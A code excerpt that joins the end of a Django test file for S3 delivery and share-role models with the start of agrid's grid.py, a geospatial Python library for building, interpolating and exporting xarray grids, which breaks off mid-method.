deliveries = self.delivery1.errors.order_by('message')
self.assertEqual(len(deliveries), 2)
self.assertEqual(deliveries[0].message, 'Error1')
self.assertEqual(deliveries[1].message, 'Error2')
class S3DeliveryBaseTestCase(TestCase):
def setUp(self):
self.email_template_set = EmailTemplateSet.objects.create(name='someset')
self.user1 = User.objects.create(username='user1')
self.user2 = User.objects.create(username='user2')
self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
self.s3_user1 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user1_s3_id',
user=self.user1)
self.s3_user2 = S3User.objects.create(endpoint=self.endpoint,
s3_id='user2_s3_id',
user=self.user2)
self.s3_bucket = S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
self.s3_bucket2 = S3Bucket.objects.create(name='mouse2', owner=self.s3_user1, endpoint=self.endpoint)
self.delivery1 = S3Delivery.objects.create(bucket=self.s3_bucket,
from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
self.delivery2 = S3Delivery.objects.create(bucket=self.s3_bucket2,
from_user=self.s3_user1, to_user=self.s3_user2,
email_template_set=self.email_template_set)
class S3DeliveryErrorTestCase(S3DeliveryBaseTestCase):
def test_create_errors(self):
S3DeliveryError.objects.create(message='Something failed', delivery=self.delivery1)
S3DeliveryError.objects.create(message='Other failed', delivery=self.delivery1)
deliveries = S3DeliveryError.objects.order_by('message')
self.assertEqual(len(deliveries), 2)
self.assertEqual(deliveries[0].message, 'Other failed')
self.assertIsNotNone(deliveries[0].created)
self.assertEqual(type(deliveries[0].created), datetime.datetime)
self.assertEqual(deliveries[1].message, 'Something failed')
self.assertIsNotNone(deliveries[1].created)
self.assertEqual(type(deliveries[1].created), datetime.datetime)
def test_read_via_delivery_errors(self):
S3DeliveryError.objects.create(message='Error1', delivery=self.delivery1)
S3DeliveryError.objects.create(message='Error2', delivery=self.delivery1)
S3DeliveryError.objects.create(message='Error3OtherDelivery', delivery=self.delivery2)
deliveries = self.delivery1.errors.order_by('message')
self.assertEqual(len(deliveries), 2)
self.assertEqual(deliveries[0].message, 'Error1')
self.assertEqual(deliveries[1].message, 'Error2')
class S3ObjectManifestTestCase(S3DeliveryBaseTestCase):
def test_create(self):
object_manifest = S3ObjectManifest.objects.create(content=[{'state': 'good', 'value': 1}])
self.delivery1.manifest = object_manifest;
self.delivery1.save()
def test_read(self):
object_manifest = S3ObjectManifest.objects.create(content=[{'state': 'bad', 'value': 0}])
self.delivery1.manifest = object_manifest;
self.delivery1.save()
manifests = S3ObjectManifest.objects.all()
self.assertEqual(len(manifests), 1)
self.assertEqual(manifests[0].content, [{'state': 'bad', 'value': 0}])
class ShareRoleTestCase(TestCase):
def test_email_template_name(self):
self.assertEqual(ShareRole.email_template_name('somerole'), 'share_somerole')
self.assertEqual(ShareRole.email_template_name('file_downloader'), 'share_file_downloader')
| 2.609375 | 3 |
agrid/grid.py | TobbeTripitaka/grid | 15 | 12764995 | <filename>agrid/grid.py
#!/usr/bin/env python3
# <NAME> 2020
# <EMAIL> <EMAIL>
# version = '0.3.9.2'
# https://doi.org/10.5281/zenodo.2553966
#
# MIT License#
# Copyright (c) 2019 <NAME>#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.#
# Standard library imports
import os
import sys
import re
import json
import glob
# Array packages and scipy
import numpy as np
import xarray as xr
import dask.array as da
import pyproj as proj
import pandas as pd
from scipy import interpolate
from scipy import stats
import scipy.ndimage
import imageio
# Vector packages
import geopandas as gpd
import fiona
# Raster packages
from affine import Affine
import rasterio
import rasterio.crs as rcrs # Fix!
from rasterio import features
from rasterio.warp import Resampling
from rasterio.windows import Window
from rasterio.plot import reshape_as_image
# Matplotlib
from matplotlib import pyplot as plt
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.widgets import Slider
import matplotlib.ticker as ticker
import cartopy as cart
import cartopy.crs as ccrs
###
# Mayavi is imported in methods, when needed.
class Grid(object):
'''
Methods to set up, save and modify a multidimensional grid.
'''
# Swich for print statements
verbose = False
km = 1000
def __init__(self,
km=km,
left=-180,
up=90,
right=180,
down=-90,
extent=None,
res=[1, 1],
center=False,
depths=[0. * km, 8. * km, 16. * km, 40. * km, 350. * km],
is_huge=1e5,
crs=4326,
crs_src=4326,
band_coord='RGB',
use_dask=False,
chunk_n=10,
coord_d_type=np.float32,
*args, **kwargs):
'''
Define projection of grid:
crs : integer
left : x or lon coordinate defineing left extent
up ; y or lat coordinate to define upper extent
right : x or lon coordinate to define right extent
down ; y or lat coordinate to define exrtent down
depths : float, integer or list of depths slices
res : resolution is the unit of crs, e.g. degrees or meters
center : Place coordinates in center of grid cell
is_huge : stops creations of crits larger than this number,
to avoid mistakes when defining grid size
use_dask : set to true to contaon dask arrays instead of numpy array
chunk_n
'''
# res given as [x,y]
self.res = list(res)
if isinstance(depths, (int, float)):
depths = [depths]
self.depths = list(depths)
# Generate exptressions for extent:
if extent is None:
self.extent = [left, right, down, up]
else:
self.extent = extent
left, right, down, up = extent
self.ul = (left, up)
self.ur = (right, up)
self.lr = (right, down)
self.ll = (left, down)
self.left, self.up, self.right, self.down = left, up, right, down
self.x1y1x2y2 = (left, up, right, down)
self.wsen = (left, down, right, up)
# Generate expressions for size:
try:
self.nx = int(abs(right - left) // res[0])
self.ny = int(abs(down - up) // res[1])
self.nn = (self.ny, self.nx)
self.nnn = (self.ny, self.nx, len(self.depths))
except ZeroDivisionError:
print('Cell size (%s, %s) is larger than grid. Choose a smaller cell size or larger grid extent.' %res)
if self.nx > is_huge or self.ny > is_huge:
raise Exception('The array is too large:', self.nn, 'Define a smaller grid or incrase the parameter "is_huge"')
# Dask
self.use_dask = use_dask
self.chunk_n = chunk_n
self.transform = rasterio.transform.from_bounds(
left, up, right, down, self.nx, self.ny)
self.coord_d_type = coord_d_type
# rasterio.transform.from_origin(self.left, self.up, *self.res)
# Make the xarray dataset
self.ds = xr.Dataset()
self.ds.coords['X'] = np.linspace(
left, right, self.nx).astype(self.coord_d_type)
self.ds.coords['Y'] = np.linspace(
down, up, self.ny).astype(self.coord_d_type)
self.nz = len(depths)
self.ds.coords['Z'] = np.array(depths).astype(coord_d_type)
assert (np.all(self.ds.coords['X'][1:] >= self.ds.coords['X'][:-1])), \
'X coords must be strictly increasing.'
assert (np.all(self.ds.coords['Y'][1:] >= self.ds.coords['Y'][:-1])), \
'Y coords must be strictly increasing.'
assert (np.all(self.ds.coords['Z'][1:] >= self.ds.coords['Z'][:-1])), \
'Z coords must be strictly increasing.'
# Define edges
self.ds.coords['X_edge'] = np.linspace(
left - res[0] / 2, right + res[0] / 2,
self.nx + 1).astype(self.coord_d_type)
self.ds.coords['Y_edge'] = np.linspace(
down - res[1] / 2, up + res[1] / 2,
self.ny + 1).astype(self.coord_d_type)
# Edges of depths slices are inter- and extrapolated around depths
depth_e = [_ - 0.5 for _ in range(len(depths) + 1)]
inter_d = interpolate.InterpolatedUnivariateSpline(range(len(depths)),
depths, k=1)
self.ds.coords['Z_edge'] = inter_d(depth_e)
# Bands are named after string, e.g. R, G and B bands
self.ds.coords[band_coord] = list(band_coord)
# Numpy arrays are indexed rows and columns (y,x)
self.shape2 = (self.ny, self.nx)
self.shape3 = (self.ny, self.nx, self.nz)
self.xv, self.yv = np.meshgrid(
self.ds.coords['X'], self.ds.coords['Y'])
self.ds.coords['XV'] = (('Y', 'X'), self.xv.astype(coord_d_type))
self.ds.coords['YV'] = (('Y', 'X'), self.yv.astype(coord_d_type))
# Define projections as proj4 strings. Integer is epsg code
if isinstance(crs, int):
crs = '+init=epsg:' + str(crs)
# Default crs of data to import
if isinstance(crs_src, int):
crs_src = '+init=epsg:' + str(crs_src)
self.crs_src = crs_src
self.crs = crs
self.lon, self.lat = proj.transform(proj.Proj(self.crs),
proj.Proj(init='epsg:4326'),
self.xv, self.yv)
self.ds.coords['lat'] = (('Y', 'X'), self.lat.astype(coord_d_type))
self.ds.coords['lon'] = (('Y', 'X'), self.lon.astype(coord_d_type))
# Using dask for coordinates
if use_dask:
self.ds = self.ds.chunk(
{'X': self.nx // chunk_n, 'Y': self.ny // chunk_n})
if self.verbose:
print('Created model:', self.name)
print('Class corners', x1y1x2y2)
print('Class nx ny', self.nx, self.ny, )
print('Depths:', depths)
# Help functions:
def _check_if_in(self, xx, yy, margin=2):
'''Generate an array of the condition that coordinates
are within the model or not.
xx = list or array of x values
yy = list or array of y values
margin = extra cells added to mitigate extrapolation of
interpolated values along the frame
returns boolean array True for points within the frame.
'''
x_min = self.left - margin * self.res[0]
x_max = self.right + margin * self.res[0]
y_min = self.down - margin * self.res[1]
y_max = self.up + margin * self.res[1]
return (xx > x_min) & (xx < x_max) & (yy > y_min) & (yy < y_max)
def _set_meridian(self, x_array, center_at_0=True):
'''
Sloppy function to change longitude values from [0..360] to [-180..180]
x_array : Numpy array with longitude values (X)
center_at_0 : Bool select direction of conversion.
lon=(((lon + 180) % 360) - 180)
'''
if center_at_0:
x_array[x_array > 180] = x_array[x_array > 180] - 360
else:
x_array[x_array < 0] = x_array[x_array < 0] + 360
return x_array
def _user_to_array(self, im_data):
'''Reads user input to numpy array.
Returns copy of data.
'''
if isinstance(im_data, str):
if im_data is '':
im_data = None
else:
im_data = self.ds[im_data].values
elif im_data is None:
im_data = np.empty(self.nn)
im_data[:] = np.nan
elif isinstance(im_data, list):
im_data = np.array(im_data)
elif isinstance(im_data, (np.ndarray, np.generic)):
pass # if numpy array
else:
im_data = im_data.values # if data frame
return np.copy(im_data)
def _set_v_range(vmin, vmax, im_data,
first_pile=0.1,
last_pile=99.9):
'''
Set color range from percentilles, to be implimented.
'''
if vmin is None:
vmin = np.nanpercentile(im_data, first_pile)
if vmax is None:
vmax = np.nanpercentile(im_data, last_pile)
return vmin, vmax
def _meta_to_dict(self,
f_name='',
meta_dict={},
get_meta_data=True,
meta_file=None):
'''Open JSON ot textfile to dict, for use as attribute data
f_name : string file to import, suffix is not used
meta_dict : Dictionary with meta data
get_meta_data : reads metadata from json file
meta_file: path to JSAOn file, if not included same name as data file
returns: dict
'''
if get_meta_data:
if meta_file is None:
meta_name = os.path.splitext(f_name)[0]
if os.path.isfile(meta_name + '.json'):
with open(meta_name + '.json', 'r') as fp:
meta_dict = {**meta_dict, **json.loads(fp.read())}
elif os.path.isfile(meta_name + '.txt'):
with open(meta_name + '.txt', 'r') as fp:
meta_dict = {**meta_dict, **{meta_name: fp.read()}}
else:
print('Need json or text file.')
return meta_dict
def _epsg_to_cartopy(self, proj4_in, **kwargs):
'''
Really annoying lookup function that pass project crs to cartopy
projection. **kwargs are passed for e.g. central_longitude,
false_easting, globe etc. See Cartopy
https://scitools.org.uk/cartopy/docs/latest/crs/projections.html
Rather short list at the moment, but is to be expanded.
'''
if isinstance(proj4_in, str):
proj4_in = int(re.findall("\d+.\d+", self.crs)[0])
assert (isinstance(proj4_in, int) and len(str(abs(proj4_in))) <= 6), \
'proj4 string cannot be converted to epsg code'
# To be read from json file.
map_proj_dict = {3031: ccrs.Stereographic(central_latitude=-90,
true_scale_latitude=-71,
**kwargs),
3030: ccrs.Stereographic(central_latitude=-90,
true_scale_latitude=71,
**kwargs),
4326: ccrs.PlateCarree(**kwargs),
900913: ccrs.GOOGLE_MERCATOR,
27700: ccrs.OSGB(**kwargs),
3413: ccrs.Stereographic(
central_longitude=-45,
central_latitude=90,
true_scale_latitude=70)
}
# Cartopy can also read other epsg codes, but only with internet connection
# The EPSG code must correspond to a “projected coordinate system”,
# EPSG codes such as 4326 (WGS-84) which define a “geodetic coordinate system” will not work.
try:
map_proj_dict = {**map_proj_dict, **{3577 : ccrs.epsg(3577)}}
except:
raise Exception('Cartopy can not read EPSG code: %s' % proj4_in)
return map_proj_dict[proj4_in]
def data_to_grid(self, data,
dims_order=['Y', 'X', 'Z', 't'],
**kwargs):
'''Convenience function
data : numpy array in the right size
dims_order: list of order to fit dims of array with grid model
kwargs sent to _meta_to_dict:
meta_dict dict with meta data
'''
dims = dims_order[:data.ndim]
# Look for meta data and write to attrs
meta_data = self._meta_to_dict(**kwargs)
return xr.DataArray(data, dims=dims, attrs=meta_data)
def save(self, data=None, file_name='grid.nc'):
'''
Saves dataset to netCDF.
file_name string
returns size of file.
'''
if data is None:
data = self.ds
data.to_netcdf(file_name)
return os.path.getsize(file_name)
def save_info(self, ds=None, file_name='info.txt', write_coords=False,
**kwargs):
'''Save json file with instance parameters
Keyword arguments:
write_coords -- writes complete list of coordinates '''
if ds is None:
ds = self.ds
if file_name is None:
file_name = 'info.txt'
info = self.__dict__.copy()
info['ds'] = 'xarray dataset'
info['coord_d_type'] = str(info['coord_d_type'])
for array in ['xv', 'yv', 'lon', 'lat']:
if write_coords:
info[array] = info[array].tolist()
else:
info[array] = info[array][
[0, 0, -1, -1], [0, -1, 0, -1]].tolist()
with open(file_name, 'w') as outfile:
json.dump(info, outfile, indent=4, ensure_ascii=False, **kwargs)
return info
def land_mask(self,
polygon_frame=None,
polygon_res=None,
all_touched=True,
oceans=True):
'''Create a 2D array with only land '''
if polygon_frame is None:
pass
# Download global vector file in with the resolution option of
# polygon_res=None)
mask = 1 # rasterize map for section
if oceans:
mask = np.invert(mask)
return mask
def change_coord(self,
array,
old,
new,
fill_value=np.nan,
interpol='linear',
axis=None,
bounds_error=False,
**kwargs):
'''Interpolate dimension into new defined depth from coord or list.
Keyword arguments:
array -- np.array, list or dataset to be interpolated at new points
if array is a string, it will be converted to data frame in self
old -- coord to interpolate
new -- coord to interpolate to
interpol -- interpolation method, e.g. nearest, linear or cubic
fill_value -- extrapolation value
'''
array = self._user_to_array(array)
old = self._user_to_array(old)
new = self._user_to_array(new)
# If none, use last dim!
if axis is None:
axis = 2
if array.ndim == 1:
axis = 0
return interpolate.interp1d(old,
array,
axis=axis,
bounds_error=bounds_error,
kind=interpol,
fill_value=fill_value,
**kwargs)(new)
def fold_to_low_res(self, large, small):
'''
Takes high resolution 2D array (large) and places subarrays in
additional dimensions.
The output array have the same resolution as the second array (small)
and can be computed together.
nx and nn of large must be a multiple of nx, and ny of small.
Keyword arguments:
large -- is high res array
small -- low res array
Returns folded high res with shape[:2] same as small.
'''
res = (np.shape(large)[0] // np.shape(small)[0],
np.shape(large)[1] // np.shape(small)[1])
return large.values.reshape(np.shape(small.values)[0], res[0],
np.shape(small.values)[1], res[1]).transpose(0, 2, 1, 3)
def flatten_to_high_res(self, folded, large):
'''Flatten a processed array back to high dimension. Reverse of fold_to_low_res.
Returns a high resolution array.
'''
return folded.transpose(0, 2, 1, 3).reshape(np.shape(large.values)[0],
np.shape(large.values)[1])
# Import data
def assign_shape(self,
f_name,
attribute=None,
z_dim=False,
z_max='z_max',
z_min='z_min',
all_touched=True,
burn_val=None,
map_to_int=True,
sort_alphabetically=False,
print_map=False,
save_map_to_text=None,
return_map=False,
fill_value=np.nan,
**kwargs):
'''Rasterize vector polygons to grid
Keyword arguments:
attribute -- Attribute values to be burned to raster
z_dim -- Make 3D raster with attributes assigned to layers
z_min -- Label for attribute that defines min...
z_max -- ...and max depths
all_touched -- Burn value if cell touches or only if crossing centre
burn_val -- Replaces attribute value
str_to_int -- Converts string attribute to integer classes.
If False, integer will result in error
save_map_to_text -- Save map to text file. E.g. attr_to_value.csv
return_map -- Set if function returns dict of integer map
Returns numpy array.
Thanks:
https://gis.stackexchange.com/questions/216745/get-polygon-shapefile-in-python-shapely-by-clipping-linearring-with-linestring/216762
'''
shape = gpd.read_file(f_name).to_crs(self.crs)
if burn_val is not None:
shape[attribute] = [burn_val] * len(shape)
# Convert strings
if map_to_int:
if sort_alphabetically:
x = sorted(list(set(shape[attribute])), key=str.lower)
else:
x = list(set(shape[attribute]))
moby_dict = dict(zip(x, list(range(1, len(x) + 1))))
if print_map:
print(moby_dict)
if save_map_to_text is not None:
pd.DataFrame(list(moby_dict.items())).to_csv(save_map_to_text)
shape[attribute] = [moby_dict[v] for v in shape[attribute]]
# With z_dim, a 3D grid can be formed where attributes are written to
# layers between z_min and Z_max
if z_dim:
data = np.empty(self.shape3)
z_select = np.empty([len(shape)]).astype('bool')
for i, zi in enumerate(self.depths):
z_select = [z_min <= zi and z_max >= zi for
z_min, z_max in zip(shape[z_min], shape[z_max])]
shape_select = shape[z_select]
to_burn = ((geom, value) for geom, value in zip(
shape_select.geometry, shape_select[attribute]))
data[:, :, i] = features.rasterize(
shapes=to_burn,
out_shape=self.shape2,
transform=self.transform,
fill=fill_value,
all_touched=all_touched,
**kwargs)
else:
data = np.empty(self.nn)
to_burn = ((geom, value)
for geom, value in zip(shape.geometry, shape[attribute]))
data = features.rasterize(
shapes=to_burn,
out_shape=self.shape2,
transform=self.transform,
fill=fill_value,
all_touched=all_touched,
**kwargs)
if (map_to_int and return_map):
return data, moby_dict
else:
return data
def read_grid(self,
f_name,
xyz=('x', 'y', 'z'),
interpol='linear',
crs_src=None,
crs=None,
use_dask=None,
dask_chunks=None,
read_dask_dict=None,
bulk=False,
extension='.nc',
ep_max=10,
pad_around=False,
sort=True,
only_frame=True,
deep_copy=False,
set_center=False,
regex_index=None,
def_depths=None,
verbose=False,
return_list=False,
names_to_numbers=True,
depth_factor=1,
name_i=-1,
**kwargs):
'''Read irregular (or regular) grid. Resampling and interpolating.
Keyword arguments:
f_name : string path to dir or file. Ii list, it is read as list of paths to files.
xyz --- Sequence with x, y and data labels
interpol --- Interpolation method, e.g cubic, nearest
only_frame --- Speeds up interpolation by only
regard points within the grid extent (+ margins)
Returns numpy array'''
if crs_src is None:
crs_src = self.crs_src
if crs is None:
crs = self.crs
if use_dask is None:
use_dask = self.use_dask
if bulk:
if isinstance(f_name, str):
assert os.path.isdir(
f_name), 'Please provide path to directory containing files.'
f_names = glob.glob(f_name + '*' + extension)
elif isinstance(f_names, list):
for f_name in f_names:
assert os.path.isfile(f_name), '%s Is not a file.' % f_name
else:
f_names = []
if sort:
f_names.sort(key=str.lower)
else:
if isinstance(f_name, str):
assert os.path.isfile(
f_name), 'Please provide path to a file, not directory. Or set bulk=True'
f_names = [f_name]
if names_to_numbers:
try:
f_names_float = [re.findall(r"[-+]?\d*\.\d+|\d+", _)
for _ in f_names]
f_names_float = [float(_[name_i]) *
depth_factor for _ in f_names_float]
except:
names_to_numbers = False
f_names_float = None
i_grid = np.empty(self.nn + (len(f_names),))
for i, f in enumerate(f_names):
if verbose:
print('%s/%s' % (i + 1, len(f_names)), f)
if isinstance(f_name, str):
array = xr.open_dataset(f, chunks=read_dask_dict).copy(
deep=deep_copy)
else:
array = f_name.copy(deep=deep_copy)
x = array[xyz[0]].values
y = array[xyz[1]].values
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
x = self._set_meridian(x)
xx, yy = np.meshgrid(x, y) # x, y
xv, yv = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), xx, yy)
zv = array[xyz[2]].values
n = zv.size
zi = np.reshape(zv, (n))
xi = np.reshape(xv, (n))
yi = np.reshape(yv, (n))
# Check and interpolate only elements in the frame
if only_frame:
is_in = self._check_if_in(xi, yi)
xi = xi[is_in]
yi = yi[is_in]
zi = zi[is_in]
arr = interpolate.griddata((xi, yi),
zi,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
if pad_around:
for i in range(ep_max)[::-1]:
arr[:, i][np.isnan(arr[:, i])] = arr[
:, i + 1][np.isnan(arr[:, i])]
arr[:, -i][np.isnan(arr[:, -i])] = arr[:, -
i - 1][np.isnan(arr[:, -i])]
arr[i, :][np.isnan(arr[i, :])] = arr[
i + 1, :][np.isnan(arr[i, :])]
arr[-i, :][np.isnan(arr[-i, :])] = arr[-i -
1, :][np.isnan(arr[-i, :])]
i_grid[..., i] = arr
if len(f_names) is 1:
i_grid = np.squeeze(i_grid, axis=2)
if dask_chunks is None:
if use_dask:
i_grid = da.from_array(i_grid, chunks=dask_chunks)
dask_chunks = (self.nx // self.chunk_n,) * i_grid.ndim
if return_list:
if names_to_numbers:
f_names = f_names_float
return i_grid, f_names
else:
return i_grid
def read_numpy(self,
x = 0,
y = 1,
z = 2,
data = None,
interpol='linear',
crs_src=None,
crs=None,
use_dask=None,
dask_chunks=None,
pad_around=False,
only_frame=True,
set_center=False,
verbose=False,
z_factor=1,
**kwargs):
'''Read numpy array and interpolate to grid.
Keyword arguments:
x,y,z numpy arrays of same size, eg, A[0,:], A[1,:], A[2,:]
Returns numpy array
kwargs to interpolation
'''
if data is not None:
x = data[:,x]
y = data[:,y]
z = data[:,z]
assert(np.shape(x)==np.shape(y)==np.shape(z)), 'x, y, and z must have the same shape.'
if crs_src is None:
crs_src = self.crs_src
if crs is None:
crs = self.crs
if verbose:
print('Shape:', np.shape(x))
if z_factor is not 1:
z *= z_factor
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
x = self._set_meridian(x)
xv, yv = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), x, y)
n = z.size
zi = np.reshape(z, (n))
xi = np.reshape(xv, (n))
yi = np.reshape(yv, (n))
# Check and interpolate only elements in the frame
if only_frame:
is_in = self._check_if_in(xi, yi)
xi = xi[is_in]
yi = yi[is_in]
zi = zi[is_in]
arr = interpolate.griddata((xi, yi),
zi,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
if pad_around:
for i in range(ep_max)[::-1]:
arr[:, i][np.isnan(arr[:, i])] = arr[
:, i + 1][np.isnan(arr[:, i])]
arr[:, -i][np.isnan(arr[:, -i])] = arr[:, -
i - 1][np.isnan(arr[:, -i])]
arr[i, :][np.isnan(arr[i, :])] = arr[
i + 1, :][np.isnan(arr[i, :])]
arr[-i, :][np.isnan(arr[-i, :])] = arr[-i -
1, :][np.isnan(arr[-i, :])]
if use_dask:
if dask_chunks is None:
dask_chunks = (self.nx // self.chunk_n,) * arr.ndim
arr = da.from_array(arr, chunks=dask_chunks)
return arr
def read_ascii(self,
f_name,
x_col=0,
y_col=1,
data_col=2,
interpol='linear',
autostrip = True,
no_data=None,
only_frame=True,
crs_src=None,
encoding = None,
set_center=False,
crs=None,
z_factor=1,
coord_factor=1,
skiprows=0,
**kwargs):
'''Read ascii table to grid
Textfile, e.g. csv, to grid.
Keyword arguments:
f_name -- String, name of file to import
x_col -- index for column holding x values in given crs
y_col --index for column holding y values in given crs
data_col -- index for column with data values
'''
if crs is None:
crs = self.crs
if crs_src is None:
crs_src = self.crs_src
if encoding is None:
encoding = 'bytes'
#table = np.loadtxt(f_name, skiprows=skiprows, **kwargs) # Add kwargs
table = np.genfromtxt(f_name,
skip_header=skiprows,
autostrip=autostrip,
encoding=encoding, **kwargs)
if self.verbose:
print(table[:5, :])
if coord_factor is not 1:
table[:, x_col] *= coord_factor
table[:, y_col] *= coord_factor
if z_factor is not 1:
table[:, data_col] *= z_factor
# Set longitude, case from 0 to -360 insetad of -180 to 180
if set_center:
table[:, x_col] = self._set_meridian(table[:, x_col])
xx, yy = proj.transform(proj.Proj(crs_src),
proj.Proj(crs), table[:, x_col], table[:, y_col])
if only_frame:
is_in = self._check_if_in(xx, yy)
xx = xx[is_in]
yy = yy[is_in]
zz = table[:, data_col][is_in]
else:
zz = table[:, data_col]
return interpolate.griddata((xx, yy),
zz,
(self.ds.coords['XV'],
self.ds.coords['YV']),
method=interpol,
**kwargs)
def read_raster(self,
f_name,
src_crs=None,
source_extra=500,
resampling=None,
sub_sampling=None,
sub_window=None,
num_threads=4,
no_data=None,
rgb_convert=True,
bit_norm=255,
**kwargs):
'''Imports raster in geotiff format to grid.
Using gdal/rasterio warp to transform raster to right crs and extent.
sub_sampling -- integer to decrease size of input raster and speed up warp
Resampling -- Interpolation method
Options for resampling:
Resampling.nearest,
Resampling.bilinear,
Resampling.cubic,
Resampling.cubic_spline,
Resampling.lanczos,
Resampling.average
A window is a view onto a rectangular subset of a raster
dataset and is described in rasterio by column and row offsets
and width and height in pixels. These may be ints or floats.
Window(col_off, row_off, width, height)
Returns numpy array.
'''
in_raster = rasterio.open(f_name)
if src_crs is None:
src_crs = in_raster.crs
if self.verbose:
print(src_crs)
if resampling is None:
resampling = Resampling.nearest
if self.verbose:
print('Raster bounds:', in_raster.bounds, in_raster.shape)
dst_crs = self.crs
if sub_sampling in (None, 0, 1):
sub_sampling = 1
raster_shape = (in_raster.count, in_raster.height //
sub_sampling, in_raster.width // sub_sampling)
# window=Window.from_slices(sub_window)
source = in_raster.read(out_shape=raster_shape)
if sub_window is None:
pass
else:
print('Window not implimented yet.')
src_transform = rasterio.transform.from_bounds(*in_raster.bounds, raster_shape[2], raster_shape[1])
dst_array = np.zeros((in_raster.count, *self.shape2))
rasterio.warp.reproject(
source,
dst_array,
src_transform=src_transform,
src_crs=src_crs,
dst_transform=self.transform,
dst_crs=dst_crs,
resampling=resampling,
source_extra=source_extra,
num_threads=num_threads,
**kwargs)
if (rgb_convert and in_raster.count > 2):
dst_array = reshape_as_image(dst_array / bit_norm).astype(float)
if in_raster.count == 1:
dst_array = dst_array[0, :, :]
if no_data is not None:
dst_array[dst_array == no_data] = np.nan
return dst_array
# Exports
def grid_to_grd(self, data, save_name='grid.nc'):
'''Save data array as netCDF
Keyword arguments:
data --- string or data array
'''
if isinstance(data, str):
data = self.ds[data]
save_grid = data.to_netcdf(save_name)
return save_grid
def grid_to_raster(self, data,
save_name='raster_export.tif',
raster_dtype=np.float64,
raster_factor=1):
'''Save as geoTIFF
data : array or label
svae_name : string save as tif name
raster_dtype : dtype to save to, e.g. bit depth
raster_factor : factor to multiply value
'''
data = (self._user_to_array(data) * raster_factor).astype(raster_dtype)
# If 2D array, define 3rd dimention as 1
if data.ndim == 2:
data.shape += 1,
n_bands = data.shape[2]
with rasterio.open(save_name, 'w', driver='GTiff',
height=data.shape[0], width=data.shape[1],
count=n_bands, dtype=raster_dtype,
crs=self.crs,
transform=self.transform) as dst:
for k in range(n_bands):
dst.write(data[:, :, k], indexes=k + 1)
return None
def grid_to_ascii(self,
data,
asc_file_name='corners.txt',
center=True,
fmt='%6.2f',
no_data=-9999):
'''Save to asc format
Keyword arguments:
corner -- Coordinates of corner, else centre
https://gis.stackexchange.com/questions/37238/writing-numpy-array-to-raster-file?rq=1
http://resources.esri.com/help/9.3/ArcGISengine/java/Gp_ToolRef/Spatial_Analyst_Tools/esri_ascii_raster_format.htm
'''
data = self._user_to_array(data)
header_labels = ['NCOLS', 'NROWS', 'XLLCORNER',
'YLLCORNER', 'CELLSIZE', 'NODATA_VALUE']
header_values = [self.nx, self.ny, self.left,
self.down, self.res[0], no_data]
if center:
header_labels[2:4] = ['XLLCENTER', 'YLLCENTER']
header_values[2:4] = header_values[2:3] + \
[self.res[0] / 2, self.res[1] / 2]
# The wunder of Python:
header = ''.join([''.join(h) for h in zip(
header_labels, [' '] * 6, [str(val) for val in header_values], ['\n'] * 6)])
np.savetxt(asc_file_name, data,
delimiter=' ',
header=header,
newline='',
comments='',
fmt=fmt)
return os.path.getsize(asc_file_name)
def bins_to_grid(self,
values,
samples=None,
xi=None,
yi=None,
zi=None,
sample_src=None,
function='mean',
return_only_statistic=True,
):
'''Reads lists of data values, and coordinates and generate
bins and apply function to each bin. E.g. to generate geographical histagrams.
values : list or array of data values
samples : array with coordnates. Must be the shape D arrays of length N, or as an (N,D)
xi : if samples is none, coordinates rae read xi, yi, zi
yi :
zi : If no zi is given, 2D bins are generated
sample_src : If not None, data points are reprojected from this CSR.
function to apply to bins. A string eg: ‘median’, 'std', 'median',
or a defined function that takes a 1D array an returnsrn a scalar.
return_only_statistic : boolean. If False, method returns statistics, edges, binnumbers
'''
def _build_samples(di, values):
di = np.array(di)
assert (np.shape(values) == np.shape(di)
), 'Samples and values must have same shape.'
return di
values = np.array(values)
if samples is not None:
samples_dim = samples.ndim + 1
else:
if zi is None:
samples_dim = 2
else:
samples_dim = 3
assert (samples_dim in [
2, 3]), 'Samples must be 2 or 3D arrays of same lenght'
if samples_dim is 2:
if samples is None:
samples = np.array((
_build_samples(yi, values),
_build_samples(xi, values),))
bins = (self.ds['Y_edge'], self.ds['X_edge'])
elif samples_dim is 3:
if samples is None:
samples = np.array((
_build_samples(yi, values),
_build_samples(xi, values),
_build_samples(zi, values),))
bins = (self.ds['Y_edge'],
self.ds['X_edge'], self.ds['Z_edge'])
if sample_src is not None:
if isinstance(sample_src, int):
sample_src = '+init=epsg:' + str(sample_src)
xi, yi = proj.transform(proj.Proj(sample_src),
proj.Proj(self.crs), samples[0], samples[1])
samples[0] = xi
samples[1] = yi
bin_data = scipy.stats.binned_statistic_dd(samples.T,
values,
statistic=function,
bins=bins,
expand_binnumbers=False)
if return_only_statistic:
return bin_data.statistic
else:
return bin_data
def grid_to_object(self, data, f_name='grid_obj'):
'''
Use Mayavi /VTK to export grid as .obj file for advance visualisation etc.
data : data to export
f_name : string file to save
'''
from mayavi import mlab
